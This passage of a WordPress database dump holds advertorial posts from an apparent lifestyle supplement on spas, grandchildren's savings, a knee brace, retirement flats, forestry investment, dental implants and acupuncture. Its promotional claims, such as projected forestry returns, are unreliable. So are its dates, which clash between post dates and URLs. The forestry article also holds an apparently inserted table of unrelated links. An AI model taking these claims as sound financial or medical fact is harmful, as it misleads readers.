cost of breaks is dependent on room type and time of year.</p>&#13;\n<p>For a full price list, visit <strong><em><a title=\"www.ragdalehall.co.uk\" href=\"http://www.ragdalehall.co.uk/\" target=\"_blank\">www.ragdalehall.co.uk</a></em><div class=\"woo-sc-hr\"></div> </strong></p>&#13;\n<h3><strong>The heat is on</strong></h3>&#13;\n<p>Ideal for those who suffer from back pain or have tired, tense muscles, the Infrared Experience at The Sanctuary Spa in Covent Garden, central London, is a bespoke, low-temperature heat treatment that penetrates deep into the skin.</p>&#13;\n<p>The 30-minute experience involves an infrared light panelled seat that warms the body from the inside out, releasing tension and helping to relax muscles.</p>&#13;\n<p>For more details of the 30-minute treatment, call 0844 875 8443, or visit<strong><em><a title=\" www.thesanctuary.co.uk\" href=\"http://www.thesanctuary.co.uk/\" target=\"_blank\">www.thesanctuary.co.uk</a></em><div class=\"woo-sc-hr\"></div></strong></p>&#13;\n<h3><strong>Fresh faced</strong></h3>&#13;\n<p><img class=\"alignleft size-medium wp-image-1057\" title=\"A 19106\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/11/soaking-up-the-atmostphere--300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />Set in the picturesque Cotswolds, Calcot Spa’s Aromatherapy Associates’ age repair facial is a great way to unwind, relax and feel your best this Christmas.</p>&#13;\n<p>Ideal for those looking for a fresher, more youthful complexion, the facial stimulates collagen production in the skin, tightening and firming its appearance without the use of harsh chemicals. The skin is cleansed and exfoliated, before being massaged with refreshing apple and raspberry seed oil.</p>&#13;\n<p>This lymphatic technique aims to improve the skin’s elasticity and suppleness. Beauty manager Francesca Jordan says: “The essential oils provide deep nourishment and visible plumping effect on fine lines.”</p>&#13;\n<p>The 85-minute treatment costs £85.</p>&#13;\n<p>For more information, visit <strong><em><a title=\"www.calcotspa.co.uk\" href=\"http://www.calcotspa.co.uk/\" target=\"_blank\">www.calcotspa.co.uk</a></em><div class=\"woo-sc-hr\"></div></strong></p>&#13;\n									</div>','Soaking up the atmosphere','404','publish','open','open','','soaking-up-the-atmosphere','','','2018-04-02 20:09:20','2018-04-02 20:09:20','',0,'http://westonspirit.org.uk/soaking-up-the-atmosphere.asp',0,'post','',0),(64,1,'2014-06-23 13:52:22','2014-06-23 13:52:22','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">22 November 2016</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"A gift that is priceless\" st_url=\"http://westonspirit.org.uk/2011/11/a-gift-that-is-priceless/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"A gift that is priceless\" st_url=\"http://westonspirit.org.uk/2011/11/a-gift-that-is-priceless/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"A gift that is priceless\" st_url=\"http://westonspirit.org.uk/2011/11/a-gift-that-is-priceless/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"A gift that is priceless\" st_url=\"http://westonspirit.org.uk/2011/11/a-gift-that-is-priceless/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"A gift that is priceless\" st_url=\"http://westonspirit.org.uk/2011/11/a-gift-that-is-priceless/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>From pension pots to bonds, how can you give your grandchildren a head start?</h4>&#13;\n<p>For growing numbers of British families, there’s no one quite like grandma (or grandpa) for help with everything from babysitting to household chores.</p>&#13;\n<p><img class=\"alignright size-medium wp-image-1061\" title=\"200436364-001\" src=\"/wp-content/uploads/2011/11/a-gift-that-is-priceless-1--300x195.jpg\" alt=\"\" width=\"300\" height=\"195\" />Soaring childcare costs and long working hours mean that 7m grandparents now look after their grandchildren and help around the home while mums and dads work, according to insurer Aviva.</p>&#13;\n<p>But a grandparent’s work is never done. Fearful for little Freddie or Fiona’s financial futures, many are also stashing away cash on their behalf – hoping to build up a nest egg for their grandchildren in future. It’s easy to understand why. As the cost of a university education now tops £63,000 and first homes are impossible to buy without a hefty deposit, any financial help offered can go a long way.</p>&#13;\n<p>But the list of products on offer can leave even the savviest grandparent flummoxed. What on earth is a JISA? Do simple savings accounts pay a decent rate of interest? How does a Children’s Bonus Bond work?</p>&#13;\n<h3><strong>Start early</strong></h3>&#13;\n<p>The stock market has been highly volatile in recent years but if you want to grow your fund quickly an investment fund is regarded by financial experts as the best option. The recent financial turmoil might mean that you’re even able to find bargains – especially if you’re investing over a longer time-frame.</p>&#13;\n<p>There are a number of investment funds targeted at children, but it is key that you consider the best performing plans – even if they’re targeted at adults. You can open the plan yourself and then add the child’s initials to the account holder designating it for them in future. This gives you control over when your grandchildren can access the cash.</p>&#13;\n<h3><strong>Tax perks</strong></h3>&#13;\n<p>Every penny counts, so make sure you look out for products offering invaluable tax breaks. The very new and tax-efficient kid on the block is the Junior Individual Savings Account (JISA).</p>&#13;\n<p>Introduced in November as a replacement for the Child Trust Fund, any child under the age of 18 who is a resident in Britain and does not already have a Child Trust Fund is eligible for a JISA. Just like an adult ISA it allows friends and family members to save up to £3,600 tax free in cash, stocks or investment funds over each year running from April 6 to April 5.</p>&#13;\n<p>Use JISA allowances to their full potential and you can build up a sizeable stash for your grandchildren. For example, a child born this year who used their JISA allowance up every year until 2029 would see their savings swell to more than £120,000 – with an annual growth rate of 4 per cent.</p>&#13;\n<h3><strong>Other tax breaks</strong></h3>&#13;\n<p>Another tax efficient long-term savings option is the government-backed Children’s Bonus Bond from National Savings and Investments. This allows anyone over the age of 16 to squirrel away up to £3,000 tax free for any child under 16 with a minimum investment of £25. The bonds – designed to be held over a five-year period – pay an annual rate of interest of 2.5 per cent and include a bonus at the end of the fifth year.</p>&#13;\n<h3><strong>Simple savings</strong></h3>&#13;\n<p>Most banks and building societies offer savings account targeted at youngsters which, in many cases, you can open on behalf of your grandchildren. Grandparents can be particularly helpful in this situation.</p>&#13;\n<p>If a child generates more than £100 interest in a year from money given by a parent, this income is taxed at that parent’s rate – either at 20, 40, or 50 per cent.</p>&#13;\n<p>However, grandparents can give as much as they like and it will be exempt of the £100 limit on interest earned. Making cash gifts is an excellent way of aiding your child’s future. HM Revenue and Customs allows you to gift £3,000 every year to an individual. Assuming average compound growth of 6 per cent a year, this should be worth over £400,000 by the time the child reaches age the age of 38, if you give £3,000 each year.</p>&#13;\n<h3><strong>Pension pot</strong></h3>&#13;\n<p>Retirement might be more than 60 years away for your grandchild, so starting up a pension fund while they are in nappies may seem like madness. But your actions could give your grandchildren a vital head start.</p>&#13;\n<p>You can put away a maximum of £2,880 on behalf of a child each year. The government will add £720 in tax relief, boosting the value to £3,600. The investments then grow free from income and capital gains tax. Bear in mind that this type of saving is very unflexible. Your grandchild won’t able to touch the pension before the age of 55.</p>&#13;\n<div class=\"woo-sc-box normal   \">&#13;\n<h3>Pensions</h3>&#13;\n<p><strong>The decision to change how the state pension is increased will have a far-reaching impact. Everyone should oppose it, says Roger Turner</strong></p>&#13;\n<p><img class=\"alignright size-thumbnail wp-image-1062\" title=\"Roger Turner\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/11/Roger-Turner-150x150.jpg\" alt=\"\" width=\"150\" height=\"150\" />Until 2016, increases in the basic state pension and SERPS were linked to the September retail prices index (RPI). Few people had heard of the consumer prices index (CPI).</p>&#13;\n<p>Then, out of the blue, without consultation, the government announced that it would be using the CPI as the measure for increases in state benefits from April 2016.</p>&#13;\n<p>Many occupational pensioners in the public and private sectors have also been affected.</p>&#13;\n<p>Does it matter which index is used? Yes, very much so. The RPI is normally about 0.5 to 1.0 per cent more than the CPI, so under RPI pensions would increase more quickly.</p>&#13;\n<p>The effect of this in any one year may be small but compounded over several years the difference is significant.</p>&#13;\n<p>For example, with the RPI at 4 per cent and CPI at 3 per cent, someone with a pension of £120 a week would be £1,560 a year (£30 a week) worse off after ten years.</p>&#13;\n<p>After 20 years, they would be £4,160 a year (£88 a week) worse off. Even if RPI is at 2.5 per cent and CPI at 2 per cent the difference is over £600 a year after ten years.</p>&#13;\n<p>With about one third of pensioners relying only on their state pensions, the switch from RPI to CPI will be a massive blow.</p>&#13;\n<p>Coming at a time of rapidly increasing fuel and food costs, it will cause real difficulty for the most vulnerable in our society.</p>&#13;\n<p>Even for people with defined contribution occupational pensions – where their contributions grow each year and the resulting pot is used to buy an annuity – there are difficulties ahead. Six months ago £100,000 would have purchased a flat rate annuity with no indexation (that is, no rise in line with inflation) or survivor benefit of about £7,000.</p>&#13;\n<p>Today, due to low interest rates and other economic factors, the same amount will buy only £6,000 – a 14 per cent reduction for the whole of someone’s retired life. Add indexation and survivor benefits and the annuity rate could drop to £3,000.</p>&#13;\n<p>NFOP has joined with several other pensioner organisations and trade unions to challenge the secretary of state’s decision to switch to the CPI measure in a judicial review. A judgement is due at the end of the month.</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><em><strong>Roger Turner</strong> is general secretary of the <strong>National Federation of Occupational Pensioners</strong>. For more on the NFOP’s campaign go to <strong><a title=\"www.nfop.org.uk\" href=\"http://www.nfop.org.uk/\" target=\"_blank\">www.nfop.org.uk</a></strong></em></p>&#13;\n</div>&#13;\n									</div>','A gift that is priceless','1183','publish','open','open','','a-gift-that-is-priceless','','','2018-04-02 20:09:18','2018-04-02 20:09:18','',0,'http://westonspirit.org.uk/a-gift-that-is-priceless.asp',0,'post','',0),(65,1,'2016-02-11 01:55:18','2016-02-11 01:55:18','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">22 November 2016</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"A new lease of life\" st_url=\"http://westonspirit.org.uk/2011/11/a-new-lease-of-life/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"A new lease of life\" st_url=\"http://westonspirit.org.uk/2011/11/a-new-lease-of-life/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"A new lease of life\" st_url=\"http://westonspirit.org.uk/2011/11/a-new-lease-of-life/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"A new lease of life\" st_url=\"http://westonspirit.org.uk/2011/11/a-new-lease-of-life/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"A new lease of life\" st_url=\"http://westonspirit.org.uk/2011/11/a-new-lease-of-life/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>A unique knee brace is helping chef Stuart Ford continue to cook up a storm at work</h4>&#13;\n<p>Stuart Ford enjoys his career as a chef, but there was a time when knee pain threatened his job. The 53-year-old, who spends hours on his feet as head chef at a restaurant in Newquay, Cornwall, says: “When I was younger it was no problem, and I used to play football, squash and golf. But osteoarthritis runs in my family and by the age of 30 my right knee was giving me a lot of pain.”</p>&#13;\n<p>Two sessions of surgery and a series of injections solved the problem for several years, but then the pain returned.</p>&#13;\n<p>“A new round of injections did not work, and the next option was partial knee replacement,” he says.</p>&#13;\n<p><img class=\"alignright size-medium wp-image-1039\" title=\"a new lease of life\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/11/a-new-lease-of-life--300x196.jpg\" alt=\"\" width=\"300\" height=\"196\" />“However, my doctor advised delaying it as long as possible, because long hours on my feet meant that the new joint would wear out quickly, so I would soon need another operation. It began to look as if I would have to give up my job.”</p>&#13;\n<p>Ford did not want that. “I never intend to be unemployed. I’d go crazy sitting at home all the time,” he says.</p>&#13;\n<p>Then he was referred to a physiotherapist who recommended the Össur Unloader One knee brace. “From the moment it was fitted it reduced my pain,” he says.</p>&#13;\n<p>“It takes about ten seconds to put on, it’s comfortable to wear and invisible under trousers. It will not cure my osteoarthritis, but it has reduced the pain so much that I can still work. I’m sure I’d have had to give up my job without it.”</p>&#13;\n<p>Ford is even considering returning to the sport he had previously been forced to give up. “I had a few practice swings with my golf clubs recently,” he says. “Soon I’m going to try to get back into the game.”</p>&#13;\n<p><strong></strong></p><div class=\"woo-sc-box normal   \"><em><strong><a title=\"www.oakneepain.co.uk\" href=\"http://www.oakneepain.co.uk/\" target=\"_blank\">www.oakneepain.co.uk</a></strong></em></div>&#13;\n									</div>','A new lease of life','315','publish','open','open','','a-new-lease-of-life','','','2018-04-02 20:09:16','2018-04-02 20:09:16','',0,'http://westonspirit.org.uk/a-new-lease-of-life.asp',0,'post','',0),(66,1,'2014-10-08 08:08:05','2014-10-08 08:08:05','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">21 November 2016</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_buttons\" st_title=\"A place you can aspire to retire in\" st_url=\"http://westonspirit.org.uk/2011/11/a-place-you-can-aspire-to-retire-in/\" displaytext=\"share\"></span><span class=\"st_linkedin_buttons\" st_title=\"A place you can aspire to retire in\" st_url=\"http://westonspirit.org.uk/2011/11/a-place-you-can-aspire-to-retire-in/\" displaytext=\"share\"></span><span class=\"st_twitter_buttons\" st_title=\"A place you can aspire to retire in\" st_url=\"http://westonspirit.org.uk/2011/11/a-place-you-can-aspire-to-retire-in/\" displaytext=\"share\"></span><span class=\"st_facebook_buttons\" st_title=\"A place you can aspire to retire in\" st_url=\"http://westonspirit.org.uk/2011/11/a-place-you-can-aspire-to-retire-in/\" displaytext=\"share\"></span><span class=\"st_plusone_buttons\" st_title=\"A place you can aspire to retire in\" st_url=\"http://westonspirit.org.uk/2011/11/a-place-you-can-aspire-to-retire-in/\" displaytext=\"share\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>Retain your independence as you get older by choosing dedicated, luxury retirement accommodation</h4>&#13;\n<p>Ask anyone what they aspire for in retirement, and independence will be near the top of the list. So how is that best achieved? By accepting the fact that as one gets older health and wellbeing may decline by varying degrees. What is the best way to address this? A new development in Wiltshire has the answers.</p>&#13;\n<p>“Better healthcare means we’re all living longer: for every six years that passes, average life expectancy rises by one year. And while healthcare is making positive strides, so too are our housing options”.</p>&#13;\n<p><img class=\"alignright size-medium wp-image-1010\" title=\"a place you can aspire\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/11/a-place-you-can-aspire--300x199.jpg\" alt=\"\" width=\"300\" height=\"199\" />Typically we now enjoy several decades of retirement. What is critical to our quality of life is that we should both maintain and enjoy a measure of independence. The fact is, our much loved family homes aren’t necessarily the best place to achieve that. They may be too large for our needs, they require maintenance – indoors and out – and they’re often distant from services and facilities we’d like closer to hand. And as it may become necessary to put adaptations in place such as stairlifts and handrails, the home may well lose its original appeal.</p>&#13;\n<p>All of this helps to explain the growing popularity of dedicated retirement developments such as Chantry Court, tucked away close to the centre of the delightful Wiltshire town of Westbury.</p><div class=\"woo-sc-quote\"><p> Chantry Court is designed specifically to enable everyone to live retirement to the full</p></div>&#13;\n<p>Chantry Court is designed specifically to enable everyone to live retirement to the full. There’s a mixture of designs within the 68 apartments to meet all requirements. A number of the apartments have private gardens, patios and balconies and family pets are allowed. The look and feel is of a luxury apartment in a well-appointed private development: only when you study the smaller details do you realise they’ve been cleverly and subtly designed.</p>&#13;\n<p>They’re certainly spacious: the four penthouse units are 1200 sq ft and the two-bedroom apartments are about 800 sq ft. The ambience is of a comfortable, wellmaintained country hotel, making the move to retirement accommodation an aspirational one – not one dictated by circumstances.</p>&#13;\n<p>On hand are all the resources and facilities to make life relaxed and fulfilling. A central area has a restaurant, bar, lounge, bridge room, library, hair salon, therapy room, doctor’s surgery and even a cinema – which doubles up as an exercise classroom. With trained staff on site 24/7, the security is a real comfort, as is the knowledge that – if someone was taken poorly in the night – help is on hand.</p>&#13;\n<p>The in-house domiciliary service is available if one needs it. This can add a ‘peace of mind factor’ in that residents will not have to worry about moving out of Chantry Court should they develop needs of any kind.</p>&#13;\n<p>Chantry Court’s Independent Living apartments are good value for money, whether one is buying, taking advantage of a shared equity option, or even renting. Special packages are available, allowing flexibility when it comes to moving, for example when you opt to move before you sell your own property. The village staff are happy to help explain the options to you, just call them to find out more.</p>&#13;\n<div class=\"woo-sc-box normal   \"><em>Apartment prices start at £187,500 or rental from £295 a week. Assisted Living apartments are from £395 a week, including a service package.</em>&#13;\n<p><em>Call <strong>0800 0147552</strong></em></p>&#13;\n<p><em><strong><a title=\"www.chantrycourt.com\" href=\"http://www.chantrycourt.com/\" target=\"_blank\">www.chantrycourt.com</a></strong></em></p></div>&#13;\n									</div>','A place you can aspire to retire in','564','publish','open','open','','a-place-you-can-aspire-to-retire-in','','','2018-04-02 20:09:15','2018-04-02 20:09:15','',0,'http://westonspirit.org.uk/a-place-you-can-aspire-to-retire-in.asp',0,'post','',0),(67,1,'2017-09-27 14:11:31','2017-09-27 14:11:31','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\"><strong>Investing in timber can offer a stable, flexible and secure eco-friendly saving plan</strong></p>&#13;\n<p>If you require an investment that offers good returns, stability and security, then Ethical Forestry’s timber investments deserve your consideration.</p>&#13;\n<p>A typical forestry investment of £18,000 over 12 years projects returns of £104,189. The investments pay out in regular intervals, making them ideal for mid to long-term financial planning.</p>&#13;\n<p><img class=\"alignright size-full wp-image-1050\" title=\"adding growth to your pension\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/11/adding-growth-to-your-pension-.jpg\" alt=\"\" width=\"300\" height=\"453\" />Ethical Forestry also tailors investments to suit an individual’s budget, making them flexible. Many investors are taking advantage of this opportunity for saving plans, family trust funds and personal pensions. The investments are HMRC-compliant and SIPP approved, so your IFA can simply transfer an existing SIPP pension, or start a new one, making investing a simple process.</p>&#13;\n<p>Investing in forestry (and ultimately timber) for profit is not a new concept. Financial institutions, hedge fund managers and trusts have invested in timber for years and produced consistent long-term profits for themselves. They are popular with investors as they offer steady, stable increases with predictably high returns and, as they are not correlated to the stock market, they do not suffer from unpredictable peaks= and troughs. Ethical Forestry has made this lucrative investment available to everyone, allowing small cap investors to benefit from this unique proposition.</p><div class=\"woo-sc-quote\"><p> A strong, influential factor in deciding whether to invest in timber is the continuing rise in demand, which is projected to rise in line with the growth of the global population </p></div>&#13;\n<table cellspacing=\"0\" cellpadding=\"0\"><col width=\"241\" /><tr><td width=\"241\"><a href=\"http://investment-direct.co.uk/\">investment-direct.co.uk </a></td>&#13;\n  </tr><tr><td><a href=\"http://givinglots.uk/\">givinglots.uk</a></td>&#13;\n  </tr><tr><td><a href=\"http://payrollgivinggrants.org.uk/\">payrollgivinggrants.org.uk</a></td>&#13;\n  </tr><tr><td><a href=\"http://insurancematter.co.uk/\">insurancematter.co.uk</a></td>&#13;\n  </tr><tr><td><a href=\"http://hipview.co.uk/\">hipview.co.uk</a></td>&#13;\n  </tr><tr><td><a href=\"http://abacrombie.co.uk/\">abacrombie.co.uk</a></td>&#13;\n  </tr><tr><td><a href=\"http://foidirectory.co.uk/\">foidirectory.co.uk</a></td>&#13;\n  </tr><tr><td><a href=\"http://brokerworld.co.uk/\">brokerworld.co.uk </a></td>&#13;\n  </tr><tr><td><a href=\"http://citizenpower.co.uk/\">citizenpower.co.uk</a></td>&#13;\n  </tr><tr><td><a href=\"http://sunalliance.co.uk/\">sunalliance.co.uk</a></td>&#13;\n  </tr></table><p>A strong, influential factor in deciding whether to invest in timber is the continuing rise in demand, which is projected to rise in line with the growth of the global population; as much as 55.88 per cent (UN) by 2050. Developing countries such as China, India and Russia are unrelenting in their requirements for timber for construction and energy wood. This is driving illegal forestry operations worldwide to cope with the demand, all with devastating effect. Combine this new appetite for timber with the existing and projected global demand, and it is easy to understand why the rainforests continue to be felled at a rate of 13 million hectares per annum – the equivalent of one football pitch every second.</p>&#13;\n<p>To help relieve this pressure on the natural supply chain, Ethical Forestry has created sustainable plantations, which offer an alternative, ecologically friendly supply source.</p>&#13;\n<p>Matthew Pickard, Ethical Forestry’s MD says: “Our plantations are run on a ‘for profit’ basis, clearly focused on producing a good ROI for investors. Investor security is of paramount importance to us, for this reason we own all of our plantations outright and have our own onsite management teams caring for them on a daily basis. No third parties are involved with our operations that you can’t keep your eye on. This way, we can ensure that all our trees are well maintained and protected, creating investor security thus making us unique within the market place.</p>&#13;\n<p>“We know that investing for profit and having a clear conscience are important considerations for investors. For every plantation that Ethical Forestry buy, we also purchase existing wild forests and place them within our forestry easement trust. This easement trust preserves these valuable forests, forever protecting them and the wildlife within them that can be so easily lost.”</p>&#13;\n<div class=\"woo-sc-box normal   \"><em>For more information about <strong>Ethical Forestry</strong>, call <strong>0800 0753 010</strong> or visit <strong><a title=\"www.forestleisure.org.uk\" href=\"http://www.forestleisure.org.uk/\" target=\"_blank\">www.forestleisure.org.uk</a></strong></em></div>&#13;\n									</div>','Adding growth to your pension','544','publish','open','open','','adding-growth-to-your-pension','','','2018-04-02 20:09:13','2018-04-02 20:09:13','',0,'http://westonspirit.org.uk/adding-growth-to-your-pension.asp',0,'post','',0),(68,1,'2016-12-07 00:39:21','2016-12-07 00:39:21','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\"> </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Chew with confidence\" st_url=\"http://westonspirit.org.uk/2011/11/chew-with-confidence/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Chew with confidence\" st_url=\"http://westonspirit.org.uk/2011/11/chew-with-confidence/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Chew with confidence\" st_url=\"http://westonspirit.org.uk/2011/11/chew-with-confidence/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Chew with confidence\" st_url=\"http://westonspirit.org.uk/2011/11/chew-with-confidence/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Chew with confidence\" st_url=\"http://westonspirit.org.uk/2011/11/chew-with-confidence/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>If you want to regain that winning smile, you can’t do much better than opt for dental implants</h4>&#13;\n<p>When you lose a tooth, it is often best for your oral health to have it replaced. Missing teeth can affect your ability to chew and speak, and can increase the burden on your remaining teeth as well as affecting your appearance and self-confidence.</p>&#13;\n<p><img class=\"alignright size-medium wp-image-1042\" style=\"border-style: initial; border-color: initial;\" title=\"chew with confidence\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/11/chew-with-confidence--300x199.jpg\" alt=\"\" width=\"300\" height=\"199\" /></p>&#13;\n<p>An implant, which is made from titanium, replaces the lost root of a tooth. A post is screwed into the centre of the implant and a crown is then either screwed in or cemented on top.</p>&#13;\n<p>The new tooth will look and feel like your own teeth. You do not have to wear a denture or grind down the adjacent healthy teeth to support a bridge. In addition, implants can secure a denture thus improving your chewing and confidence.</p>&#13;\n<p>The whole procedure can be done simply in the dental chair and is pain free. Post-operative pain is usually not a problem for patients either. Simple painkillers taken for one or two days are all that is needed.</p>&#13;\n<p><img class=\"alignleft size-medium wp-image-1043\" title=\"chew with confidence 2\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/11/chew-with-confidence-2-300x199.jpg\" alt=\"\" width=\"300\" height=\"199\" />Sometimes it is possible to take out the tooth and place the implant in one visit thus shortening the treatment time. However, this approach may not be suitable for everyone as it can involve a greater risk of complications for patients.</p>&#13;\n<p>If your tooth has been missing for some time, the bone is likely to have become thinner or to have shrunk. If the bone has shrunk, you may need to have additional bone built up. This procedure can be done when the implant is placed and is not painful.</p>&#13;\n<p>Implants are a predictable, long-lasting and successful treatment option.</p>&#13;\n<div class=\"woo-sc-box normal   \">&#13;\n<p><em>Harley Street Dental Clinic</em></p>&#13;\n<p><em><strong><a title=\"www.harleystreetdentalclinic.co.uk\" href=\"http://www.harleystreetdentalclinic.co.uk/\" target=\"_blank\">www.harleystreetdentalclinic.co.uk</a></strong></em></p>&#13;\n</div>&#13;\n									</div>','Chew with confidence','285','publish','open','open','','chew-with-confidence','','','2018-04-02 20:09:12','2018-04-02 20:09:12','',0,'http://westonspirit.org.uk/chew-with-confidence.asp',0,'post','',0),(69,1,'2017-05-16 18:06:19','2017-05-16 18:06:19','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">20 November 2016</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_buttons\" st_title=\"Get Up And Go – unwrap the festive season\" st_url=\"http://westonspirit.org.uk/2011/11/november-issue/\" displaytext=\"share\"></span><span class=\"st_linkedin_buttons\" st_title=\"Get Up And Go – unwrap the festive season\" st_url=\"http://westonspirit.org.uk/2011/11/november-issue/\" displaytext=\"share\"></span><span class=\"st_twitter_buttons\" st_title=\"Get Up And Go – unwrap the festive season\" st_url=\"http://westonspirit.org.uk/2011/11/november-issue/\" displaytext=\"share\"></span><span class=\"st_facebook_buttons\" st_title=\"Get Up And Go – unwrap the festive season\" st_url=\"http://westonspirit.org.uk/2011/11/november-issue/\" displaytext=\"share\"></span><span class=\"st_plusone_buttons\" st_title=\"Get Up And Go – unwrap the festive season\" st_url=\"http://westonspirit.org.uk/2011/11/november-issue/\" displaytext=\"share\"></span>						</div>&#13;\n                	                	                	<p>It’s never too early to get ready for Christmas. Read our recommendations on where to go and what to buy your loved ones. And if the youngest in your family already have more toys than they know what to do with, read our tips on how you can help them save for a rainy day. </p>&#13;\n<p>Distributed with <em>The Sunday Telegraph</em></p>&#13;\n<p><object style=\"width:610px;height:400px\"><param name=\"movie\" value=\"http://static.issuu.com/webembed/viewers/style1/v1/IssuuViewer.swf?mode=embed&amp;documentId=111121125731-48780be1563b40d49a39cf3375ae8903&amp;docName=get_up_and_go&amp;username=Lyonsdown&amp;loadingInfoText=Get%20up%20and%20go&amp;backgroundColor=FFF9B6&amp;layout=http%3A%2F%2Fskin.issuu.com%2Fv%2Fcolor%2Flayout.xml\" /><param name=\"allowfullscreen\" value=\"true\" /><param name=\"menu\" value=\"false\" /><embed src=\"/webembed/viewers/style1/v1/IssuuViewer.swf\" type=\"application/x-shockwave-flash\" style=\"width:610px;height:400px\" flashvars=\"mode=embed&amp;documentId=111121125731-48780be1563b40d49a39cf3375ae8903&amp;docName=get_up_and_go&amp;username=Lyonsdown&amp;loadingInfoText=Get%20up%20and%20go&amp;backgroundColor=FFF9B6&amp;layout=http%3A%2F%2Fskin.issuu.com%2Fv%2Fcolor%2Flayout.xml\" allowfullscreen=\"true\" menu=\"false\"></embed></object></p>&#13;\n									</div>','Get Up And Go – unwrap the festive season','70','publish','open','open','','get-up-and-go-unwrap-the-festive-season','','','2018-04-02 20:09:10','2018-04-02 20:09:10','',0,'http://westonspirit.org.uk/get-up-and-go-unwrap-the-festive-season.asp',0,'post','',0),(70,1,'2015-07-22 08:28:31','2015-07-22 08:28:31','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">22 November 2016</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> dwain\" title=\"Posts by Deborah Wain\" rel=\"author\"&gt;Deborah Wain</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Pains and needles\" st_url=\"http://westonspirit.org.uk/2011/11/pains-and-needles/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Pains and needles\" st_url=\"http://westonspirit.org.uk/2011/11/pains-and-needles/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Pains and needles\" st_url=\"http://westonspirit.org.uk/2011/11/pains-and-needles/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Pains and needles\" st_url=\"http://westonspirit.org.uk/2011/11/pains-and-needles/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Pains and needles\" st_url=\"http://westonspirit.org.uk/2011/11/pains-and-needles/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Once thought of as a quack treatment, acupuncture is now available for some on the NHS</h4>&#13;\n<p><img class=\"alignright size-medium wp-image-1052\" title=\"pains and needles\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/11/pains-and-needles--300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />When Vanessa Cox Pendray developed osteoarthritis in her neck following an injury, moving her head became extremely painful and restricted. As a textile designer and later a ceramic artist, it was especially hard for her to cope.</p>&#13;\n<p>“I’m a creative person with lots of life in me but some days I couldn’t get out of bed. Conventional treatments weren’t really helping which was depressing,” she says.</p>&#13;\n<p>Cox Pendray’s “release”, as she describes it, came in the form of acupuncture – the practice of inserting and manipulating fine needles into specific points on the body. Acupuncture is increasingly being used to relieve symptoms of degenerative and inflammatory arthritis and other musculoskeletal conditions.</p>&#13;\n<p>“It’s given me lift-off again,” enthuses the 65-year-old from Ware, Hertfordshire. “I work, have completed a master’s degree, and can dance, which I love to do. I have the treatment ‘topped up’ and pains that have started to come back again recede.”</p>&#13;\n<p>Lavinia Dionisio, 76, of Chiswick, west London, turned to acupuncture after 18 years of pain and stiffness in joints in her body.</p>&#13;\n<p>“Some parts of my body are now pain free and my movement has also improved,” she says. “I used to crawl upstairs but can now go up normally. I take only a small dose of anti-inflammatory drugs which used to cause side effects like an upset stomach and hair loss.”</p>&#13;\n<p><img class=\"alignleft size-medium wp-image-1054\" title=\"pians and needles\" 